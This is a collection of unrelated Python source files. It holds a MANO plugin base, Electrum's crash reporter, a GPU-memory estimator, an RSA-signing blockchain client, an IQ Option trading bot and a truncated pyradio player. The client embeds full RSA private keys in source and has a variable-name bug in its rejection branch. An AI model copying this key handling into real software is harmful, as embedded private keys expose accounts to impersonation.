- register / de-register plugin to plugin manager
It also implements a automatic heartbeat mechanism that periodically sends
heartbeat notifications.
"""
def __init__(self,
name="son-plugin",
version=None,
description=None,
auto_register=True,
wait_for_registration=True,
auto_heartbeat_rate=0.5):
"""
Performs plugin initialization steps, e.g., connection setup
:param name: Plugin name prefix
:param version: Plugin version
:param description: A description string
:param auto_register: Automatically register on init
:param wait_for_registration: Wait for registration before returning from init
:param auto_heartbeat_rate: rate of automatic heartbeat notifications 1/n seconds. 0=deactivated
:return:
"""
self.name = "%s.%s" % (name, self.__class__.__name__)
self.version = version
self.description = description
self.uuid = None # uuid given by plugin manager on registration
self.state = None # the state of this plugin READY/RUNNING/PAUSED/FAILED
LOG.info(
"Starting MANO Plugin: %r ..." % self.name)
# create and initialize broker connection
self.manoconn = messaging.ManoBrokerRequestResponseConnection(self.name)
# register subscriptions
self.declare_subscriptions()
# register to plugin manager
if auto_register:
self.register()
if wait_for_registration:
self._wait_for_registration()
# add additional subscriptions
self._register_lifecycle_endpoints()
# kick-off automatic heartbeat mechanism
self._auto_heartbeat(auto_heartbeat_rate)
# jump to run
self.run()
def __del__(self):
"""
Actions done when plugin is destroyed.
:return:
"""
# de-register this plugin
self.deregister()
self.manoconn.stop_connection()
del self.manoconn
def _auto_heartbeat(self, rate):
"""
A simple periodic heartbeat mechanism.
(much room for improvements here)
:param rate: rate of heartbeat notifications
:return:
"""
if rate <= 0:
return
def run():
while True:
if self.uuid is not None:
self._send_heartbeat()
time.sleep(1/rate)
# run heartbeats in separated thread
t = threading.Thread(target=run)
t.daemon = True
t.start()
def _send_heartbeat(self):
self.manoconn.notify(
"platform.management.plugin.%s.heartbeat" % str(self.uuid),
json.dumps({"uuid": self.uuid,
"state": str(self.state)}))
def declare_subscriptions(self):
"""
Can be overwritten by subclass.
But: The this superclass method should be called in any case.
"""
# plugin status update subscription
self.manoconn.register_notification_endpoint(
self.on_plugin_status_update, # call back method
"platform.management.plugin.status")
def run(self):
"""
To be overwritten by subclass
"""
# go into infinity loop (we could do anything here)
while True:
time.sleep(1)
def on_lifecycle_start(self, ch, method, properties, message):
"""
To be overwritten by subclass
"""
LOG.debug("Received lifecycle.start event.")
self.state = "RUNNING"
def on_lifecycle_pause(self, ch, method, properties, message):
"""
To be overwritten by subclass
"""
LOG.debug("Received lifecycle.pause event.")
self.state = "PAUSED"
def on_lifecycle_stop(self, ch, method, properties, message):
"""
To be overwritten by subclass
"""
LOG.debug("Received lifecycle.stop event.")
self.deregister()
exit(0)
def on_registration_ok(self):
"""
To be overwritten by subclass
"""
LOG.debug("Received registration ok event.")
pass
def on_plugin_status_update(self, ch, method, properties, message):
"""
To be overwritten by subclass.
Called when a plugin list status update
is received from the plugin manager.
"""
LOG.debug("Received plugin status update %r." % str(message))
def register(self):
"""
Send a register request to the plugin manager component to announce this plugin.
"""
message = {"name": self.name,
"version": self.version,
"description": self.description}
self.manoconn.call_async(self._on_register_response,
"platform.management.plugin.register",
json.dumps(message))
def _on_register_response(self, ch, method, props, response):
"""
Event triggered when register response is received.
:param props: response properties
:param response: response body
:return: None
"""
response = json.loads(str(response, "utf-8"))
if response.get("status") != "OK":
LOG.debug("Response %r" % response)
LOG.error("Plugin registration failed. Exit.")
exit(1)
self.uuid = response.get("uuid")
# mark this plugin to be ready to be started
self.state = "READY"
LOG.info("Plugin registered with UUID: %r" % response.get("uuid"))
# jump to on_registration_ok()
self.on_registration_ok()
self._send_heartbeat()
def deregister(self):
"""
Send a deregister event to the plugin manager component.
"""
LOG.info("De-registering plugin...")
message = {"uuid": self.uuid}
self.manoconn.call_async(self._on_deregister_response,
"platform.management.plugin.deregister",
json.dumps(message))
def _on_deregister_response(self, ch, method, props, response):
"""
Event triggered when de-register response is received.
:param props: response properties
:param response: response body
:return: None
"""
response = json.loads(str(response, "utf-8"))
if response.get("status") != "OK":
LOG.error("Plugin de-registration failed. Exit.")
exit(1)
LOG.info("Plugin de-registered.")
def _wait_for_registration(self, timeout=5, sleep_interval=0.1):
"""
Method to do active waiting until the registration is completed.
(not nice, but ok for now)
:param timeout: max wait
:param sleep_interval: sleep interval
:return: None
"""
# FIXME: Use threading.Event() for this?
c = 0
LOG.debug("Waiting for registration (timeout=%d) ..." % timeout)
while self.uuid is None and c < timeout:
time.sleep(sleep_interval)
c += sleep_interval
def _register_lifecycle_endpoints(self):
if self.uuid is not None:
# lifecycle.start
self.manoconn.register_notification_endpoint(
self.on_lifecycle_start, # call back method
"platform.management.plugin.%s.lifecycle.start" % str(self.uuid))
# lifecycle.pause
self.manoconn.register_notification_endpoint(
self.on_lifecycle_pause, # call back method
"platform.management.plugin.%s.lifecycle.pause" % str(self.uuid))
# lifecycle.stop
self.manoconn.register_notification_endpoint(
self.on_lifecycle_stop, # call back method
"platform.management.plugin.%s.lifecycle.stop" % str(self.uuid))
|
base_crash_reporter.py | # Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum.org"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def _get_traceback_str(self) -> str:
return "".join(traceback.format_exception(*self.exc_args))
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
estGPUSize.py | #Parts of code in this file have been taken (copied) from https://github.com/ml-jku/lsc
#Copyright (C) 2018 Andreas Mayr
from __future__ import print_function
from __future__ import division
import numpy as np
import scipy
import scipy.sparse
import pandas as pd
import itertools
import pickle
#import imp
import os
import pathlib
from multiprocessing import Process, Manager, Array
import tensorflow as tf
os.environ['CUDA_VISIBLE_DEVICES'] = ''
gpu_options=tf.ConfigProto()
gpu_options.gpu_options.allow_growth=True
import time
import gc
import argparse
import utilsLib
import actLib
basePath=os.getcwd()
catalog=basePath.split('python_code')[0]
methodPath = basePath+'/python_code/gc/'
#np.set_printoptions(threshold='nan')
np.set_printoptions(threshold=1000)
np.set_printoptions(linewidth=160)
np.set_printoptions(precision=4)
np.set_printoptions(edgeitems=15)
np.set_printoptions(suppress=True)
pd.set_option('display.width', 160)
pd.options.display.float_format = '{:.2f}'.format
parser = argparse.ArgumentParser()
parser.add_argument("-availableGPU", help="GPU for Test", type=int, default=0)
parser.add_argument("-originalData", help="Path for original data", type=str,default=catalog+'/test_data/')
parser.add_argument("-featureoutname", help="pckl file name", type=str, default="test")
parser.add_argument("-datasetNames", help="DatasetNames", nargs='+', type=str, default=["graphConv"])
parser.add_argument("-saveBasePath", help="saveBasePath", type=str,default=catalog+'/res_test_data/')
args = parser.parse_args()
availableGPU=args.availableGPU
dataPathSave=args.originalData
featureoutname = args.featureoutname
datasetNames=args.datasetNames
saveBasePath=args.saveBasePath
if not os.path.exists(saveBasePath):
os.makedirs(saveBasePath)
os.environ['CUDA_VISIBLE_DEVICES']=str(availableGPU)
for datasetName in datasetNames:
savePath=saveBasePath+datasetName+"/"
if not os.path.exists(savePath):
os.makedirs(savePath)
batchSize=128
exec(open(methodPath+'hyperparams.py').read(), globals())
graphInputData=None
denseOutputData=None
sparseOutputData=None
exec(open(methodPath+'loadData.py').read(), globals())
if not denseOutputData is None:
nrOutputTargets=denseOutputData.shape[1]
if not sparseOutputData is None:
nrOutputTargets=sparseOutputData.shape[1]
manager=Manager()
sizeArray = Array("l", [0]*hyperParams.shape[0])
def myfuncHyper():
import pynvml
pynvml.nvmlInit()
deviceCount = pynvml.nvmlDeviceGetCount()
handle=pynvml.nvmlDeviceGetHandleByIndex(int(os.environ['CUDA_VISIBLE_DEVICES']))
gpuMem=pynvml.nvmlDeviceGetMemoryInfo(handle)
print("Init")
print(gpuMem.used)
exec(open(methodPath+'models.py').read(), globals())
randSamples=np.random.random_integers(0, len(graphInputData), batchSize)
batchGraphX=graphInputData[randSamples]
batchDenseY=denseOutputData[randSamples]
batchInputSingle=[mychemblConvertedMols[molX] for molX in batchGraphX]
batchInput=batchFunc(model, batchInputSingle)
myfeedDict=batchInput
myfeedDict[model.label]=(batchDenseY>0.5).astype(np.integer)
myfeedDict[model.weights]=(np.abs(batchDenseY)>0.5).astype(np.integer)
myfeedDict[model._training_placeholder]=1.0
with model._get_tf("Graph").as_default():
try:
model.session.run([model._get_tf('train_op'), updateOps], feed_dict=myfeedDict)
except:
print("Error in Training!")
myfeedDict=batchInput
myfeedDict[model._training_placeholder]=0.0
with model._get_tf("Graph").as_default():
myres=model.session.run(model.outputs[0], feed_dict=myfeedDict)
print("GPU")
gpuMem=pynvml.nvmlDeviceGetMemoryInfo(handle)
sizeArray[paramNr]=gpuMem.used
print(gpuMem.used)
for paramNr in range(0, hyperParams.shape[0]):
p = Process(target=myfuncHyper)
p.start()
p.join()
sizeArr=np.array(sizeArray)
sizeArr.tofile(savePath+"hyperSize.npy")
totalSize = Array("l", [0])
def myfuncTotal():
import pynvml
pynvml.nvmlInit()
deviceCount = pynvml.nvmlDeviceGetCount()
handle=pynvml.nvmlDeviceGetHandleByIndex(int(os.environ['CUDA_VISIBLE_DEVICES']))
gpuMem=pynvml.nvmlDeviceGetMemoryInfo(handle)
totalMem=gpuMem.total
totalSize[0]=totalMem
p = Process(target=myfuncTotal)
p.start()
p.join()
totalSize=np.array(totalSize)
totalSize.tofile(savePath+"totalSize.npy")
print(datasetName)
print(sizeArr/totalSize[0])
print(np.max(sizeArr/totalSize[0]))
|
client.py | import socket
import threading
import sys
import rsa
import pickle
import hashlib
import json
#Wait for incoming data from server
#.decode is used to turn the message in bytes to a string
challange = ''
pubkey = ''
privkey = ''
email = ''
host = "localhost"
port = 1818
'''
connect(pubkey,privkey,email,challange) sends your signed PublicKey and email to the server in order to be authenticated
'''
def connect(pubkey,privkey,email,challange):
strpubkey = str(pubkey.n) + ' ' + str(pubkey.e)
verify = 'pk ' + strpubkey + ' ' + 'email ' + email + ' ' + 'chal ' + challange
signature = rsa.sign(verify.encode('utf-8'), privkey,'SHA-256').hex()
verify = verify + ' ' + signature
sock.sendall(str.encode(verify))
print('sending ' + verify)
'''
VerifyBlock(block) verify the block sent by the server by checking all signature of new nodes in the current block
answer with the signature of the block's hash if the block is valid,
answer with the hash of the current block if it is invalid
'''
def VerifyBlock(block):
ver = 1
print("verifying block validity")
for i in block[2]:
message = 'pk' + ' ' + str(i[0][0]) + ' ' + str(i[0][1]) + ' ' + 'email' + ' ' + i[1] + ' ' + 'chal' + ' ' + i[2]
pk = rsa.PublicKey(i[0][0],i[0][1])
sign = i[3]
hashing = rsa.verify( message.encode('utf-8'),bytes.fromhex(sign), pk)
print(hashing)
if hashing == 'SHA-256':
ver = ver and 1
else:
ver = 0
if ver:
signatureblock = rsa.sign(block[3].encode('utf-8'), privkey,'SHA-256').hex()
strpubkey = str(pubkey.n) + ' ' + str(pubkey.e)
verify = 'pk ' + strpubkey + ' ' + 'email ' + email + ' ' + 'sign ' + signatureblock
signature = rsa.sign(verify.encode('utf-8'), privkey,'SHA-256').hex()
verify = verify + ' ' + signature
sock.sendall(str.encode(verify))
print('sending consensus answer yes :')
print(verify)
else :
trpubkey = str(pubkey.n) + ' ' + str(pubkey.e)
verify = 'pk ' + strpubkey + ' ' + 'email ' + email + ' ' + 'sign ' + block[3]
signature = rsa.sign(verify.encode('utf-8'), privkey,'SHA-256').hex()
verify = verify + ' ' + signature
sock.sendall(str.encode(verify))
print('sending consensus answer no')
return 0
'''
receive(socket, signal) manages received messages
'''
def receive(socket, signal):
global challange
while signal:
try:
data = socket.recv(2048).decode()
if data[0] == '[':
print('received block')
block = json.loads(data)
VerifyBlock(block)
else:
parsed = data.split()
if parsed[0] == 'challange':
challange = parsed[1]
print('received challange ' + challange)
else:
print(data)
except Exception as e:
print("You have been disconnected from the server")
print(e)
signal = False
break
#Attemp to connect to the server
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
except:
print("Could not make a connection to the server")
input("Press enter to quit")
sys.exit(0)
receiveThread = threading.Thread(target = receive, args = (sock, True))
receiveThread.start()
#managing the client input in order to facilitate the comunication with the server by automatically formatting the messages
while True:
message = input()
if message == "disconnect":
sock.close()
break
elif message == "generate key":
(pubkey, privkey) = rsa.newkeys(1024)
print(pubkey,privkey)
elif message == "set email":
email = input()
elif message == "connect 1":
email = 'root1@test.it'
pubkey = rsa.PublicKey(119770777999616036964482036516193989899837494454402262212320174845526315404803216372320908306890372744930417223903886098713646467509959684974498601907444633130871922367704281375480264549968160821209935332888725265017711576900685345115234860380091711666493101127543579986394987372953112289819973821762408459967, 65537)
privkey = rsa.PrivateKey(119770777999616036964482036516193989899837494454402262212320174845526315404803216372320908306890372744930417223903886098713646467509959684974498601907444633130871922367704281375480264549968160821209935332888725265017711576900685345115234860380091711666493101127543579986394987372953112289819973821762408459967, 65537, 26672787965643774653960592077053439775823248417870836580692020566557159670615117307078805205289607248001273164515879848188438137133342411190667965317897481933437357035191631621435183169027975469714776027703265905819830236529825367804990665646494281767030763234952167320037607890847457162373522698431596532433, 44659137180340759958876268803910738747846956308877335366447217803000626835077167992126311203807815386442987763059259322597082273294981350200211351269897238930582823, 2681887415691942777453365642395488321778607617182533102316008461281165410069044712411935606017878562867819962411244465549964698676032292471234729)
connect(pubkey,privkey,email,challange)
elif message == "connect 2":
email = 'root2@test.it'
pubkey = rsa.PublicKey(116004225281319987658573288348459366496825961115624594341053052723162029806559546870943101465716069245005380880466778730925720191554438789145759559892723660608772015906113267763487059561271967567199756257816686273390854357775870689254778084091408084059783060034916665868756548222191625642387394930123129730919, 65537)
privkey = rsa.PrivateKey(116004225281319987658573288348459366496825961115624594341053052723162029806559546870943101465716069245005380880466778730925720191554438789145759559892723660608772015906113267763487059561271967567199756257816686273390854357775870689254778084091408084059783060034916665868756548222191625642387394930123129730919, 65537, 113320818876899872284198551861646354006031628798745779549087652599135699074503696388675836534119786824762950537076211012597395858576174156886959581017346963896001018404143622564211141719854525829550608916151368531836600479017473926312966740769334280199642829633488405627689309329200361626967289394328986603433, 42529141898798550074390381613514100832398610399548991394201753219908682699756557812504021128503749882433121509892134810553736929811847405998308431364025901191831659, 2727640862290642914891780043841902802059534011350400735385751755117353221263229955061265447186961196541215691807749681300629491007786242856113141)
connect(pubkey,privkey,email,challange)
elif message == "connect 3":
email = 'root3@test.it'
privkey = rsa.PrivateKey(109408188808701462640681109534230415304054106571571409068865576027621529910922398951526070278451372101046352348576215241867114264747162101621938943056178439695690196413133683262343747311106890948975255893206864300355425778544110774780433868823662949090038382720445032632463499921195438372329573837611870173277, 65537, 45506474491300992876120761780270486759741991409958726212798979766192155329689086668899234779137066879814799558567512264492663193962843763494093910425610983554005997286234475141975340643742712015777804207496155334910020640773306453461045307844102122538866056278052833734250234103417673578143880763270663772853, 38196746067665208846318603661019859626469465948352325521601923806482253200289334112047295440512532950051393369177934693725502119802374393783504063188907822979385147, 2864332700353213131452119459146118535261726744960550663702850991242233277360099402842124943729519059624954124555522674428143485009472784984126791)
pubkey = rsa.PublicKey(109408188808701462640681109534230415304054106571571409068865576027621529910922398951526070278451372101046352348576215241867114264747162101621938943056178439695690196413133683262343747311106890948975255893206864300355425778544110774780433868823662949090038382720445032632463499921195438372329573837611870173277, 65537)
connect(pubkey,privkey,email,challange)
elif message == "connect new":
print("enter email")
email = input()
(pubkey, privkey) = rsa.newkeys(1024)
print('generating keys')
print((pubkey, privkey))
connect(pubkey,privkey,email,challange)
else:
print('hello')
|
BinaryOptionAlgo.py | from iqoptionapi.stable_api import IQ_Option
import time, logging, configparser
from datetime import datetime, date, timedelta
from multiprocessing import Process
import os
import numpy as np
logging.disable(level=logging.DEBUG)
def get_balance(iqoapi):
return iqoapi.get_balance()
def get_payout(iqoapi, active):
iqoapi.subscribe_strike_list(active, 1)
while True:
d = iqoapi.get_digital_current_profit(active, 1)
if d:
d = round(int(d) / 100, 2)
break
time.sleep(1)
iqoapi.unsubscribe_strike_list(active, 1)
return d
def configuracao():
arquivo = configparser.RawConfigParser()
arquivo.read('config.txt')
return {'sorosgale': arquivo.get('GERAL', 'sorosgale'),
'levels': arquivo.get('GERAL', 'levels'),
'active': arquivo.get('GERAL', 'active'),
'login': arquivo.get('GERAL', 'login'),
'password': arquivo.get('GERAL', 'password')}
def entradas(iqoapi, par, entrada, direcao, operacao):
status, id = iqoapi.buy_digital_spot(par, entrada, direcao, 1) if operacao == 1 else iqoapi.buy(
entrada, par, direcao, 1)
if status:
while True:
status, valor = iqoapi.check_win_digital_v2(id) if operacao == 1 else iqoapi.check_win_v3(id)
if status:
if valor > 0:
return status, round(valor, 2)
else:
return status, round(valor, 2)
break
else:
return False, 0
def mhi_strategy(iqoapi, active):
# Define the number of digits of price and indicators
max_dict = 6
size = 5 * 60
direction = None
# Get total of digits used by iq
iqoapi.start_candles_stream(active, size, max_dict)
velas = iqoapi.get_realtime_candles(active, size)
inputs = {
'open': np.array([]),
'high': np.array([]),
'low': np.array([]),
'close': np.array([]),
'volume': np.array([]),
'at': np.array([])
}
for timestamp in velas:
inputs['open'] = np.append(inputs['open'], velas[timestamp]['open'])
inputs['close'] = np.append(inputs['close'], velas[timestamp]['close'])
inputs['volume'] = np.append(inputs['volume'], velas[timestamp]['volume'])
velas[0] = 'g' if inputs['open'][0] < inputs['close'][0] else 'r' if inputs['open'][0] > inputs['close'][0] else 'd'
velas[1] = 'g' if inputs['open'][1] < inputs['close'][1] else 'r' if inputs['open'][1] > inputs['close'][1] else 'd'
velas[2] = 'g' if inputs['open'][2] < inputs['close'][2] else 'r' if inputs['open'][2] > inputs['close'][2] else 'd'
velas[3] = 'g' if inputs['open'][3] < inputs['close'][3] else 'r' if inputs['open'][3] > inputs['close'][3] else 'd'
velas[4] = 'g' if inputs['open'][4] < inputs['close'][4] else 'r' if inputs['open'][4] > inputs['close'][4] else 'd'
velas[5] = 'g' if inputs['open'][5] < inputs['close'][5] else 'r' if inputs['open'][5] > inputs['close'][5] else 'd'
cores = velas[0] + ' ' + velas[1] + ' ' + velas[2] + ' ' + velas[3] + ' ' + velas[4] + ' ' + velas[5]
print('Cores total ', cores)
color_candles = 3
if (cores.count('g') + cores.count('r')) == 6:
if cores.count('r') < color_candles:
direction = 'call'
elif cores.count('g') < color_candles:
direction = 'put'
return direction
def get_initial_amount(iqoapi, active, amount_by_payout):
balance = get_balance(iqoapi)
payout = str(get_payout(iqoapi, active))
initial_percent = float(amount_by_payout[payout]) / 100
return round(initial_percent * balance, 2)
def run_auto_bo(active, email, pwd):
# Connect to IQOption
iqoapi = IQ_Option(email, pwd)
iqoapi.connect()
# Account type REAL, PRACTICE
acc_type = 'PRACTICE'
iqoapi.change_balance(acc_type) # PRACTICE / REAL
operacao = 1
while True:
if not iqoapi.check_connect():
print('Connection error')
iqoapi.connect()
else:
print('\n\nConnection success!')
break
time.sleep(1)
amount_by_payout = {'0.74': '0.99', '0.75': '0.97', '0.76': '0.96', '0.77': '0.94', '0.78': '0.93', '0.79': '0.91',
'0.80': '0.90', '0.81': '0.88', '0.82': '0.87', '0.83': '0.85', '0.84': '0.84', '0.85': '0.83',
'0.86': '0.82', '0.87': '0.80', '0.88': '0.79', '0.89': '0.78', '0.90': '0.77', '0.91': '0.76',
'0.92': '0.75', '0.93': '0.74', '0.94': '0.73', '0.95': '0.72', '0.96': '0.71', '0.97': '0.70',
'0.98': '0.69', '0.99': '0.68', '100': '0.67'}
direction = None
lucro_total = 0
while True:
print('Iniciando processamento para ', active)
initial_amount = get_initial_amount(iqoapi, active, amount_by_payout)
print('Initial amount ', initial_amount)
direction = mhi_strategy(iqoapi, active)
print("deu direction ", direction)
lucre_opera = 0
minutos = float(((datetime.now()).strftime('%M.%S'))[1:])
entrar = True if (4.58 <= minutos <= 5) or minutos >= 9.58 else False
if entrar:
while True:
#verifica velas
status, valor = entradas(iqoapi, active, initial_amount, direction, 1)
lucro_total += valor
if status and valor < 0:
perda = abs(valor)
for i in range(2):
if lucre_opera >= perda:
break
if direction:
status, valor_soros = entradas(iqoapi, active, (perda / 2) + lucre_opera, direction, 1)
if status:
if valor_soros > 0:
lucre_opera += round(valor_soros, 2)
else:
lucre_opera = 0
perda += round(abs(valor_soros), 2) / 2
print('Resultado operação: ', end='')
print('WIN /' if valor > 0 else 'LOSS /', round(valor, 2), '/', round(lucre_opera, 2),
('/ ' + str(i) + ' GALE' if i > 0 else ''))
# Carrega as configuracoes
config = configuracao()
if __name__ == '__main__':
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_DYNAMIC'] = 'FALSE'
expiration = 5
actives = {expiration: ('EURUSD',)}
email = config['login']
pwd = config['password']
for expiration_time, active_list in actives.items():
for active in active_list:
Process(target=run_auto_bo, args=(active, email, pwd)).start()
|
player.py | # -*- coding: utf-8 -*-
import subprocess
import threading
import os
import logging
from os.path import expanduser
from sys import platform, version_info
from sys import exit
from time import sleep
import json
import socket
logger = logging.getLogger(__name__)
class Player(object):
""" Media player class. Playing is handled by player sub classes """
process = None
icy_title_prefix = 'Title: '
title_prefix = ''
# Input: old user input - used to early suppress output
# in case of consecutive equal messages
# Volume: old volume input - used to suppress output (and firing of delay thread)
# in case of consecutive equal volume messages
# Title: old title input - printed by delay thread
oldUserInput = {'Input': '', 'Volume': '', 'Title': ''}
""" volume percentage """
volume = -1
delay_thread = None
connection_timeout_thread = None
""" make it possible to change volume but not show it """
show_volume = True
muted = False
status_update_lock = threading.Lock()
ctrl_c_pressed = False
""" When found in station transmission, playback is on """
_playback_token_tuple = ( 'AO: [', )
playback_is_on = False
_station_encoding = 'utf-8'
# used to stop mpv update thread on python3
stop_mpv_status_update_thread = False
def __init__(self, outputStream, playback_timeout, playback_timeout_handler):
self.outputStream = outputStream
try:
self.playback_timeout = int(playback_timeout)
except:
self.playback_timeout = 10
self.playback_timeout_handler = playback_timeout_handler
def __del__(self):
self.close()
def save_volume(self):
pass
def _do_save_volume(self, config_string):
if not self.config_files:
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Volume not saved!!! (config file not found!!!)')
return 'Volume not saved!!!'
ret_strings = ('Volume: already saved...',
'Volume: {}% saved',
'Volume: {}% NOT saved (Error writing file)',
'Volume: NOT saved!')
log_strings = ('Volume is -1. Aborting...',
'Volume is {}%. Saving...',
'Error saving profile "{}"',
'Error saving volume...')
if self.volume == -1:
""" inform no change """
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug(log_strings[0])
return ret_strings[0]
elif self.volume == -2:
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug(log_strings[3])
return ret_strings[3]
else:
""" change volume """
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug(log_strings[1].format(self.volume))
profile_found = False
config_file = self.config_files[0]
ret_string = ret_strings[1].format(str(self.volume))
if os.path.exists(config_file):
if platform.startswith('win'):
with open(config_file, 'r') as c_file:
config_string = c_file.read()
if "volume=" in config_string:
vol = config_string.splitlines()
for i, v_string in enumerate(vol):
if v_string.startswith('volume'):
vol[i] = 'volume={}'.format(self.volume)
break
config_string = '\n'.join(vol)
else:
out = config_string + 'volume={}'.format(self.volume)
config_string = out
try:
with open(config_file, "w") as c_file:
c_file.write(config_string)
self.volume = -1
self.PROFILE_FROM_USER = True
except:
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug(log_strings[2].format(config_file))
return ret_strings[2].format(str(self.volume))
else:
if self.PROFILE_FROM_USER:
with open(config_file, 'r') as c_file:
config_string = c_file.read()
if "[pyradio]" in config_string:
profile_found = True
""" split on [pyradio]
last item has our options """
sections = config_string.split("[pyradio]")
""" split at [ - i.e. isolate consecutive profiles
first item has pyradio options """
py_section = sections[-1].split("[")
""" split to lines in order to get '^volume=' """
py_options = py_section[0].split("\n")
""" replace volume line """
vol_set = False
for i, opt in enumerate(py_options):
if opt.startswith("volume="):
py_options[i]="volume=" + str(self.volume)
vol_set = True
break
""" or add it if it does not exist """
if not vol_set:
py_options.append("volume=" + str(self.volume))
""" join lines together in py_section's first item """
py_section[0] = "\n".join(py_options)
""" join consecutive profiles (if exist)
in last item of sections """
if len(py_section) > 1:
sections[-1] = "[".join(py_section)
else:
sections[-1] = py_section[0]
""" finally get the string back together """
config_string = "[pyradio]".join(sections)
try:
with open(config_file, "w") as c_file:
c_file.write(config_string)
self.volume = -1
except EnvironmentError:
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug(log_strings[2].format(config_file))
return ret_strings[2].format(str(self.volume))
""" no user profile or user config file does not exist """
if not profile_found:
if not os.path.isdir(os.path.dirname(config_file)):
try:
os.mkdir(os.path.dirname(config_file))
except OSError:
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug(log_strings[2].format(config_file))
return ret_strings[2].format(str(self.volume))
new_profile_string = "volume=100\n\n" + config_string
try:
with open(config_file, "a") as c_file:
c_file.write(new_profile_string.format(str(self.volume)))
except EnvironmentError:
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug(log_strings[2].format(config_file))
return ret_strings[2].format(str(self.volume))
self.volume = -1
self.PROFILE_FROM_USER = True
return ret_string
def _is_in_playback_token(self, a_string):
for a_token in self._playback_token_tuple:
if a_token in a_string:
return True
return False
def updateStatus(self, *args):
has_error = False
if (logger.isEnabledFor(logging.DEBUG)):
logger.debug("updateStatus thread started.")
try:
out = self.process.stdout
while(True):
subsystemOutRaw = out.readline()
try:
subsystemOut = subsystemOutRaw.decode(self._station_encoding, "replace")
except:
subsystemOut = subsystemOutRaw.decode("utf-8", "replace")
if subsystemOut == '':
break
if not self._is_accepted_input(subsystemOut):
continue
subsystemOut = subsystemOut.strip()
subsystemOut = subsystemOut.replace("\r", "").replace("\n", "")
if self.oldUserInput['Input'] != subsystemOut:
if (logger.isEnabledFor(logging.DEBUG)):
if version_info < (3, 0):
disp = subsystemOut.encode('utf-8', 'replace').strip()
logger.debug("User input: {}".format(disp))
else:
logger.debug("User input: {}".format(subsystemOut))
self.oldUserInput['Input'] = subsystemOut
if self.volume_string in subsystemOut:
# disable volume for mpv
if self.PLAYER_CMD != "mpv":
#logger.error("***** volume")
